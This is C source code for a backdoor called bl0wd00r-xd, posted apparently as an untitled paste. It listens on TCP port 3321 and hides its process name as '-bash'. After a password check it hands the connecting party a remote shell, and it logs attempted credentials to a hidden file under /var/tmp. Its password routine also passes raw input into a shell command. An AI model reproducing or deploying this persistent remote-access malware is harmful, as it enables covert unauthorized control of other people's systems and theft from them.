Untitled

/*
* bl0wd00r-xd.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <signal.h>

#define port    3321            // port to listen on
#define term    "/bin/sh"       // program to run
#define logs    "/var/tmp/.os"  // dir of logs
#define pass    "" // password encrypted with md5sum !! important
#define proc    "-bash" // hidden syntax

#define B 1024

char a[36];

static void bala(const char *b, int dodnet2) {
if (!strcmp(b, "exit")) {
exit(0);
}
if (!strncmp(b, "cd ", 3)) {
if (chdir(b +3) < 0) perror("chdir");
return ;
} else {
system(b);
}
}

mdpass(char *aa) {
    FILE *temp;
    char mps[1024];
    snprintf(mps, 1024, "/bin/echo -n %s|/usr/bin/md5sum", aa);
    temp = popen(mps, "r");
    memset(a, 0, 36);
    fread(a, 32, 1, temp);
    fclose(temp);
    return a;
}

int main (int argc, char *argv[]) {
    int dodnet, dodnet2, size;
    struct sockaddr_in local;
    struct sockaddr_in remote;
    char cmd[256];
    strcpy (argv[0], proc);
    signal (SIGCHLD, SIG_IGN);
    bzero (&local, sizeof(local));
    local.sin_family = AF_INET;
    local.sin_port = htons (port);
    local.sin_addr.s_addr = INADDR_ANY;
    bzero (&(local.sin_zero), 8);
    if ((dodnet = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); }
    if (bind (dodnet, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); }
    if (listen(dodnet, 5) == -1) { perror("listen"); exit(1); }
    size = sizeof(struct sockaddr_in);
    forkpid();
    while (1) {
        if ((dodnet2 = accept (dodnet, (struct sockaddr *)&remote, &size)) == -1) { perror ("accept"); exit(1); }
    if (!fork ()) {
    char check[15], username[15];
    int i;
    send (dodnet2, "user: ", sizeof("user: "), 0);
    recv (dodnet2, username, sizeof(username), 0);
    send (dodnet2, "pass: ", sizeof("pass: "), 0);
    recv (dodnet2, check, sizeof(check), 0);
    for (i = 0; i < strlen (check); i++) {
    if (check[i] == '\n' || check[i] == '\r') {
    check[i] = '\0';
    }
        }
    for (i = 0; i < strlen (username); i++) {
    if (username[i] == '\n' || username[i] == '\r') {
    username[i] = '\0';
    }
    }
    if (strncmp(mdpass(check), pass,32) != 0) {
        fuckoff(dodnet2, check, username);
        } else {
        getshell(dodnet2, username, dodnet);
        }
    }
    else {
        signal (SIGCHLD, SIG_IGN);
        close(dodnet2);
        }
    }
    close (dodnet2);
    exit(0);
}

forkpid() {
    int pid;
    signal(SIGCHLD,SIG_IGN);
    pid = fork();
    if(pid>0) {
    sleep(1);
    exit(EXIT_SUCCESS);
    }
    if(pid == 0) {
    signal(SIGCHLD,SIG_DFL);
    return getpid();
    }
    return -1;
}

fuckoff(int dodnet2, char *tentou, char *identifica) {
    FILE *aa;
    char a[B];
    signal(SIGCHLD,SIG_IGN);
    aa=fopen(logs,"a+");
    snprintf(a, sizeof(a),"date>>%s",logs);
    system(a);
    fprintf(aa,"Ident as:       %s",identifica);
    fprintf(aa,"\nAction:       incorrect pass\n");
    fprintf(aa,"Pass:       %s",tentou);
    fprintf(aa,"\n-----------------------\n");
    fclose(aa);
    close (dodnet2);
    exit(0);
}

getshell(int dodnet2, char *identifica) {
        FILE *aa;
        char a[B];
    char b[BUFSIZ];
    int i;
        aa=fopen(logs,"a+");
        snprintf(a,sizeof(a),"date>>%s",logs);
        system(a);
        fprintf(aa,"Ident as:              (%s).",identifica);
        fprintf(aa,"\nAction     :      correct password");
    send (dodnet2, "Connected,logged In", sizeof("Connected,logged In"), 0);
    send (dodnet2, "\nxdzr00t# ", sizeof("\nxdzr00t# "), 0);
        fclose(aa);
    close(0);
    close(1);
    close(2);
    dup2 (dodnet2, 0);
    dup2(dodnet2, 1);
    dup2(dodnet2, 2);
    for(;;) {
    printf("xdzr00t# ");
    fgets(b,256,stdin);
    for (i=0;i<strlen (b);i++) {
        if(b[i]=='\n' || b[i]=='\r') {
    b[i]='\0';
    }
    }
    bala(b,dodnet2);
    fflush(stdout);
    }
}